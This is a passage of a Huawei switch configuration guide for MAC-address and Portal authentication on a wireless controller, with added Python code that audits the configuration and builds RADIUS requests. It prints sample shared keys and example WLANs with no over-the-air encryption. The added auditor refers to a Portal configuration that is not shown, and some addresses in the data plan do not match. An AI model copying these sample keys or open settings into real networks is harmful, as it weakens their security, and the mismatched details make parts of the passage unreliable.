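A static check over an AC configuration file in the format shown above, as an added example that is not part of the Huawei document. It parses the VRP running-config layout (one space of indentation per nesting level, `#` between blocks; an assumption about the format, not stated on the page), then verifies what a reviewer would otherwise check by eye: every Portal server template carries a shared key, every `portal-access-profile` references templates that exist, every `authentication-profile` resolves, and every VAP's service VLAN has an authentication profile bound on its VLANIF, so no SSID silently bypasses Portal. It also reports the two weak-by-design properties visible in the page's configuration: the Portal login page served over plain `http://`, and a security profile with no `security ...` line, meaning OPEN with no over-the-air encryption (the `security ` keyword check is an assumption about how the policy line is printed). `CONFIG` is a constructed excerpt with three defects planted so that each check fires.

```python
"""Static checks on a Huawei AC configuration file (VRP running-config format). Added example."""
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed excerpt of the AC file above. Planted defects: portal3 has no shared-key,
# portal-access-profile portal2 references a template that does not exist, and Vlanif102
# (service VLAN of wlan-vap2) has no authentication-profile bound.
CONFIG = """\
#
web-auth-server portal1
 shared-key cipher %^%#T)1I)52A-*iIrZ>='1l:P[[TYo!BX7_Z/AJkCGxC%^%#
 url http://10.23.30.1:8080/portal
#
web-auth-server portal3
 url http://10.23.30.3:8080/portal
#
portal-access-profile name portal1
 web-auth-server portal1 portal3 layer3
#
portal-access-profile name portal2
 web-auth-server portal2 portal3 layer3
#
authentication-profile name portal1
 portal-access-profile portal1
#
interface Vlanif101
 authentication-profile portal1
#
interface Vlanif102
#
wlan
 security-profile name wlan-security
 ssid-profile name wlan-ssid
  ssid city-wlan
 vap-profile name wlan-vap1
  service-vlan vlan-id 101
  ssid-profile wlan-ssid
  security-profile wlan-security
 vap-profile name wlan-vap2
  service-vlan vlan-id 102
  ssid-profile wlan-ssid
  security-profile wlan-security
#
"""


@dataclass
class Node:
    cmd: str
    children: List["Node"] = field(default_factory=list)

    def lines(self, prefix: str) -> List["Node"]:
        return [c for c in self.children if c.cmd.startswith(prefix)]


def parse_config(text: str) -> List[Node]:
    """Nest commands by indentation (assumed one space per level); '#' lines separate blocks."""
    root = Node("")
    stack = [(-1, root)]
    for raw in text.splitlines():
        if not raw.strip() or raw.strip() == "#":
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        node = Node(raw.strip())
        while stack[-1][0] >= indent:          # close deeper or same-level blocks
            stack.pop()
        stack[-1][1].children.append(node)
        stack.append((indent, node))
    return root.children


def _by_name(nodes: List[Node], prefix: str) -> Dict[str, Node]:
    """Index 'web-auth-server portal1', 'vap-profile name wlan-vap1', 'interface Vlanif101' by last token."""
    return {n.cmd.split()[-1]: n for n in nodes if n.cmd.startswith(prefix)}


def audit(text: str) -> List[str]:
    top = parse_config(text)
    findings: List[str] = []
    portals = _by_name(top, "web-auth-server ")
    access = _by_name(top, "portal-access-profile name ")
    authp = _by_name(top, "authentication-profile name ")

    for name, n in portals.items():
        if not n.lines("shared-key"):
            findings.append(f"web-auth-server {name}: no shared-key, Portal server messages are not authenticated")
        if n.lines("url http://"):
            findings.append(f"web-auth-server {name}: Portal login page is served over cleartext HTTP")
    for name, n in access.items():
        for ln in n.lines("web-auth-server "):
            for ref in ln.cmd.split()[1:]:
                if ref not in ("direct", "layer3") and ref not in portals:
                    findings.append(f"portal-access-profile {name}: references undefined web-auth-server {ref}")
    for name, n in authp.items():
        for ln in n.lines("portal-access-profile "):
            if ln.cmd.split()[1] not in access:
                findings.append(f"authentication-profile {name}: references undefined portal-access-profile {ln.cmd.split()[1]}")

    auth_vlan: Dict[str, str] = {}            # VLAN ID -> authentication profile bound on its VLANIF
    for name, n in _by_name(top, "interface Vlanif").items():
        for ln in n.lines("authentication-profile "):
            prof = ln.cmd.split()[1]
            if prof not in authp:
                findings.append(f"interface {name}: references undefined authentication-profile {prof}")
            auth_vlan[name[len("Vlanif"):]] = prof

    for w in (n for n in top if n.cmd == "wlan"):
        sec = _by_name(w.children, "security-profile name ")
        ssid = _by_name(w.children, "ssid-profile name ")
        for name, v in _by_name(w.children, "vap-profile name ").items():
            for kind, table in (("ssid-profile", ssid), ("security-profile", sec)):
                for ln in v.lines(kind + " "):
                    ref = ln.cmd.split()[1]
                    if ref not in table:
                        findings.append(f"vap-profile {name}: references undefined {kind} {ref}")
                    elif kind == "security-profile" and not table[ref].lines("security "):
                        findings.append(f"vap-profile {name}: security policy OPEN, no over-the-air encryption (Portal only controls access)")
            for ln in v.lines("service-vlan vlan-id "):
                vid = ln.cmd.split()[-1]
                if vid not in auth_vlan:
                    findings.append(f"vap-profile {name}: service VLAN {vid} has no authentication-profile bound, STAs bypass Portal")
    return findings


if __name__ == "__main__":
    for line in audit(CONFIG):
        print(line)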

16.6 Example for Configuring MAC Address Authentication on the Wireless Side

MAC Address Authentication on the Wireless Side Overview


MAC address authentication controls a user's network access rights based on the user's
interface and MAC address. The user does not need to install any client software. The device
starts authenticating a user when detecting the user's MAC address for the first time on the
interface where MAC address authentication has been enabled. During the authentication
process, the user does not need to enter a user name or password.

Configuration Notes
l In this example, MAC address authentication is used. To ensure network security,
configure an appropriate security policy according to service requirements.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, many broadcast packets will be
transmitted in the VLANs, or WLAN users on different APs can directly communicate at
Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the

management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-13 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
V200R007C00:
AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN,
AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN,
AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24,
AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN,
AP4050DN-E, AP4050DN-HD
V200R006C20:
AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN,
AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN,
AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN,
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN,
AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN,
AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
As shown in Figure 16-5, an AC in an enterprise is connected to the AP through access
switch SwitchA. The enterprise deploys the WLAN wlan-net to provide wireless network
access for employees. The AC functions as the DHCP server to assign IP addresses on the
network segment 10.23.101.0/24 to wireless users.

Because the WLAN is open to users, there are potential security risks to enterprise
information if no access control is configured for the WLAN. To meet the enterprise's security
requirements, configure MAC address authentication to authenticate dumb terminals such as
wireless network printers and wireless phones that cannot have an authentication client

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 1233


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches 16 Typical WLAN-AC Configuration (Applicable to
Typical Configuration Examples Versions V200R009)

installed. MAC addresses of terminals are used as user information and sent to the RADIUS
server for authentication. When users connect to the WLAN, authentication is not required.

Figure 16-5 Networking diagram for configuring MAC address authentication on the wireless side
[Figure: RADIUS server 10.23.200.1:1812 in the intranet; AC uplink GE1/0/2 in VLAN 101; AC GE1/0/1 (VLAN 100) connects to SwitchA GE0/0/2 (VLAN 100); SwitchA GE0/0/1 (VLAN 100) connects to AP area_1, which serves the STAs. Management VLAN: VLAN 100. Service VLAN: VLAN 101.]

Context

Table 16-14 Data plan

RADIUS authentication parameters
  Name of the RADIUS authentication scheme: radius_huawei
  Name of the RADIUS server template: radius_huawei
  l IP address: 10.23.200.1
  l Authentication port number: 1812
  l Shared key: Huawei@123
  AAA domain: huawei.com

MAC access profile
  l Name: m1
  l User name and password for MAC address authentication: MAC addresses without hyphens (-)

Authentication profile
  l Name: p1
  l Bound profile: MAC access profile m1
  l Forcible authentication domain: huawei.com

DHCP server
  The AC functions as the DHCP server to assign IP addresses to the AP and STAs.

IP address pool for the AP
  10.23.100.2 to 10.23.100.254/24

IP address pool for the STAs
  10.23.101.2 to 10.23.101.254/24

IP address of the AC's source interface
  VLANIF 100: 10.23.100.1/24

AP group
  l Name: ap-group1
  l Bound profile: VAP profile wlan-vap and regulatory domain profile domain1

Regulatory domain profile
  l Name: domain1
  l Country code: CN

SSID profile
  l Name: wlan-ssid
  l SSID name: wlan-net

Security profile
  l Name: wlan-security
  l Security policy: Open

VAP profile
  l Name: wlan-vap
  l Forwarding mode: tunnel forwarding
  l Service VLAN: VLAN 101
  l Bound profile: SSID profile wlan-ssid, security profile wlan-security, and authentication profile p1

Configuration Roadmap
1. Configure basic WLAN services so that the AC can communicate with upper-layer and
lower-layer devices and the AP can go online.
2. Configure RADIUS authentication parameters.
3. Configure a MAC access profile to manage MAC access control parameters.
4. Configure an authentication profile to manage NAC configuration.
5. Configure WLAN service parameters, and bind a security policy profile and an
authentication profile to a VAP profile to control access from STAs.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.

# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


NOTE

Configure AC uplink interfaces to transparently transmit packets of service VLANs as required and
communicate with the upstream device.

# Add AC uplink interface GE1/0/2 to service VLAN 101.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and the AP.

# Configure the AC as the DHCP server to allocate an IP address to the AP from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure a route from the AC to the RADIUS server (Assume that the IP address of the
upper-layer device connected to the AC is 10.23.101.2).
[AC] ip route-static 10.23.200.1 255.255.255.0 10.23.101.2

Step 5 Configure the AP to go online.

# Create an AP group and add the AP to the AP group.


[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor  : normal          [1]
-----------------------------------------------------------------------------------------
ID   MAC             Name     Group      IP             Type           State   STA   Uptime
-----------------------------------------------------------------------------------------
0    60de-4476-e360  area_1   ap-group1  10.23.100.254  AP6010DN-AGN   nor     0     10S
-----------------------------------------------------------------------------------------
Total: 1

Step 6 Configure a RADIUS server template, and a RADIUS authentication scheme.


NOTE

Ensure that the RADIUS server IP address, port number, and shared key are configured correctly and are
the same as those on the RADIUS server.

# Configure a RADIUS server template.


[AC] radius-server template radius_huawei
[AC-radius-radius_huawei] radius-server authentication 10.23.200.1 1812
[AC-radius-radius_huawei] radius-server shared-key cipher Huawei@123
[AC-radius-radius_huawei] quit

# Configure a RADIUS authentication scheme.


[AC] aaa
[AC-aaa] authentication-scheme radius_huawei
[AC-aaa-authen-radius_huawei] authentication-mode radius
[AC-aaa-authen-radius_huawei] quit

# Create an AAA domain and configure the RADIUS server template and authentication
scheme.
[AC-aaa] domain huawei.com
[AC-aaa-domain-huawei.com] radius-server radius_huawei
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

Step 7 Configure the MAC access profile m1.


NOTE

In a MAC access profile, a MAC address without hyphens (-) is used as the user name and password for
MAC address authentication.
[AC] mac-access-profile name m1
[AC-mac-access-profile-m1] quit

Step 8 Configure the authentication profile p1.


[AC] authentication-profile name p1
[AC-authen-profile-p1] mac-access-profile m1
[AC-authen-profile-p1] access-domain huawei.com mac-authen force
[AC-authen-profile-p1] quit

Step 9 Configure WLAN service parameters.


# Create security profile wlan-security and set the security policy in the profile. By default,
the security policy is open system.
[AC] wlan
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create VAP profile wlan-vap, configure the data forwarding mode and service VLANs, and
apply the security profile, SSID profile, and authentication profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] authentication-profile p1
[AC-wlan-vap-prof-wlan-vap] quit

# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.

[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 10 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 11 Verify the configuration.


After dumb terminals associate with the WLAN, authentication is performed automatically.
Users can directly access the network after the authentication succeeds.

----End
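What the MAC access profile of Step 7 and the RADIUS settings of Step 6 produce on the wire, as an added example that is not Huawei's code: the AC sends a RADIUS Access-Request whose User-Name and User-Password are both the STA's MAC address without hyphens (the data-plan rule), the password is hidden under the shared key Huawei@123 as RFC 2865 prescribes, and the server can only reveal it if its key matches. The Calling-Station-Id format, the server-side MAC allow-list and the accept/reject logic are assumptions constructed for illustration.

```python
"""Added example (not Huawei's code): the RADIUS exchange behind MAC address
authentication.  Data-plan values: shared key Huawei@123, MACs in Huawei's
hyphenated form.  Allow-list and Calling-Station-Id format are constructed."""
import hashlib
import os
import struct

ACCESS_REQUEST = 1                 # RADIUS code (RFC 2865)
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_CALLING_STATION_ID = 31
SHARED_KEY = b"Huawei@123"         # must equal the key configured on the RADIUS server


def mac_to_credential(mac):
    """MAC access profile rule: the MAC without hyphens is user name and password."""
    return mac.replace("-", "").replace(":", "").lower()


def hide_password(password, secret, authenticator):
    """RFC 2865 5.2: pad to a 16-byte multiple, XOR each block with
    MD5(secret + previous block); the first 'previous block' is the
    Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        out, prev = out + block, block
    return out


def reveal_password(hidden, secret, authenticator):
    """Inverse of hide_password; only works with the same shared key."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out, prev = out + bytes(c ^ k for c, k in zip(block, key)), block
    return out.rstrip(b"\x00")


def attr(code, value):
    return struct.pack("!BB", code, len(value) + 2) + value


def build_access_request(mac, secret=SHARED_KEY, identifier=1, authenticator=None):
    """Access-Request as the AC would build it for a STA with the given MAC."""
    authenticator = authenticator or os.urandom(16)
    cred = mac_to_credential(mac).encode("ascii")
    attrs = (attr(ATTR_USER_NAME, cred)
             + attr(ATTR_USER_PASSWORD, hide_password(cred, secret, authenticator))
             + attr(ATTR_CALLING_STATION_ID, mac.encode("ascii")))   # format assumed
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs))
    return header + authenticator + attrs


def parse_attrs(packet):
    attrs, i = {}, 20
    while i < len(packet):
        if i + 2 > len(packet):
            raise ValueError("truncated attribute header")
        code, length = packet[i], packet[i + 1]
        if length < 2 or i + length > len(packet):
            raise ValueError("malformed attribute length")
        attrs[code] = packet[i + 2:i + length]
        i += length
    return attrs


def server_decision(packet, allowed_macs, secret=SHARED_KEY):
    """Constructed server-side policy: accept only when the revealed password
    equals the user name (so the shared key matched) and the MAC is allowed."""
    code, _ident, length = struct.unpack("!BBH", packet[:4])
    if code != ACCESS_REQUEST or length != len(packet):
        return "Access-Reject"
    attrs = parse_attrs(packet)
    user = attrs.get(ATTR_USER_NAME, b"")
    password = reveal_password(attrs.get(ATTR_USER_PASSWORD, b""), secret, packet[4:20])
    if password == user and user.decode("ascii", "replace") in allowed_macs:
        return "Access-Accept"
    return "Access-Reject"
```

The example makes two things visible that the CLI hides: a key mismatch between the AC and the server (the case the NOTE under Step 6 warns about) surfaces as an Access-Reject because the password no longer decrypts to the user name, and the only thing a dumb terminal ever proves is its MAC address, so the access decision lives entirely in the server's allow-list.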

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 101
#
authentication-profile name p1
mac-access-profile m1
access-domain huawei.com mac-authen force
#
dhcp enable
#
radius-server template radius_huawei
radius-server shared-key cipher %^%#Oc6_BMCw#9gZ2@SMVtk!PAC6>Ou*eLW/"qLp+f#$%^%#
radius-server authentication 10.23.200.1 1812 weight 80
#
mac-access-profile name m1
#
aaa
authentication-scheme radius_huawei
authentication-mode radius
domain huawei.com
authentication-scheme radius_huawei
radius-server radius_huawei
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
ip route-static 10.23.200.0 255.255.255.0 10.23.101.2
#
capwap source interface vlanif100
#
wlan
security-profile name wlan-security
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
authentication-profile p1
regulatory-domain-profile name domain1
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
vap-profile wlan-vap wlan 1
radio 1
vap-profile wlan-vap wlan 1
ap-id 0 ap-mac 60de-4476-e360
ap-name area_1
ap-group ap-group1
#
return

16.7 Example for Configuring Portal Authentication on the Wireless Side

Portal Authentication on the Wireless Side Overview


Portal authentication is also called web authentication. Generally, Portal authentication
websites are also called Portal websites. When users go online, they must be authenticated on
Portal websites. The users can use network resources only after they pass the authentication.

A user can access a known Portal authentication website and enter a user name and password
for authentication. This mode is called active authentication. If a user attempts to access other
external networks through HTTP, the device forcibly redirects the user to the Portal
authentication website for Portal authentication. This mode is called forcible authentication.

Configuration Notes
l In this example, Portal authentication is used. To ensure network security, configure an
appropriate security policy according to service requirements.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, many broadcast packets will be
transmitted in the VLANs, or WLAN users on different APs will be able to communicate
directly at Layer 2.

l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-15 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
As shown in Figure 16-6, there are a large number of STAs on an enterprise network. A
WLAN with the SSID guest is deployed in the lobby of the office building to provide
wireless access services for guests. A WLAN with the SSID employee is deployed in office
areas to provide wireless access services for employees.
To ensure network security, the enterprise needs to deploy an authentication system to
implement access control for all the wireless users who attempt to connect to the enterprise
network. Only authenticated users can connect to the enterprise network. Because a large
number of STAs move between areas, the administrator decides to configure Portal
authentication on the AC, which sits on the Layer 3 network, to control access.

Figure 16-6 Networking diagram for configuring Portal authentication on the wireless side
[Figure: Router GE2/0/0 (VLANIF 201: 10.67.201.1/24) connects to the intranet and the server area (Portal, RADIUS, DNS...) and to Switch_B GE1/0/3 (VLANIF 201: 10.67.201.2/24). Switch_B GE1/0/2 (VLANIF 200: 10.45.200.2/24) connects to AC GE1/0/1 (VLAN 200, VLANIF 200: 10.45.200.1/24). Switch_B also has VLANIF 100: 10.23.100.1/24, VLANIF 101: 10.23.101.1/24 and VLANIF 102: 10.23.102.1/24, and its GE1/0/1 connects to Switch_A GE0/0/5. Switch_A GE0/0/1 to GE0/0/4 connect to APs lobby_1 and lobby_2 (lobby) and office2_1 and office2_2 (office area), which serve the STAs. Management VLAN: 100. Service VLAN: VLAN pool.]

Context

Table 16-16 Data plan

RADIUS authentication parameters
  Name of the RADIUS authentication scheme: radius_huawei
  Name of the RADIUS server template: radius_huawei
  l IP address: 172.16.1.1
  l Authentication port number: 1812
  l Shared key: Huawei@123
  AAA domain: huawei.com

Portal server profile
  l Name: abc
  l IP address: 172.16.1.1
  l Destination port number in the packets that the AC sends to the Portal server: 50200
  l Portal shared key: Admin@123

Portal access profile
  l Name: portal1
  l Bound profile: Portal server profile abc

Authentication-free rule profile
  l Name: default_free_rule
  l Authentication-free resource: IP address of the DNS server (172.16.1.2)

Authentication profile
  l Name: p1
  l Bound profile: Portal access profile p1, and authentication-free rule profile default_free_rule
  l Forcible authentication domain: huawei.com

DHCP server
  The router functions as the DHCP server to assign IP addresses to the STAs and APs.

IP address pool for the APs
  10.23.100.2 to 10.23.100.254/24

IP address pool for the STAs
  10.23.101.2 to 10.23.101.254/24
  10.23.102.2 to 10.23.102.254/24

VLAN pool
  Name: sta-pool
  VLANs added to the VLAN pool: VLAN 101 and VLAN 102

IP address of the AC's source interface
  VLANIF100: 10.45.200.1/24

AP group
  Name: guest
  Bound profile: VAP profile guest and regulatory domain profile domain1
  Name: employee
  Bound profile: VAP profile employee and regulatory domain profile domain1

Regulatory domain profile
  Name: domain1
  Country code: CN

SSID profile
  Name: guest
  SSID name: guest
  Name: employee
  SSID name: employee

Security profile
  l Name: wlan-security
  l Security policy: Open

VAP profile
  Name: guest
  l Forwarding mode: tunnel forwarding
  l Service VLAN: VLANs in the VLAN pool
  l Bound profile: SSID profile guest, security profile wlan-security, and authentication profile p1
  Name: employee
  l Forwarding mode: tunnel forwarding
  l Service VLAN: VLANs in the VLAN pool
  l Bound profile: SSID profile employee, security profile wlan-security, and authentication profile p1

NOTE

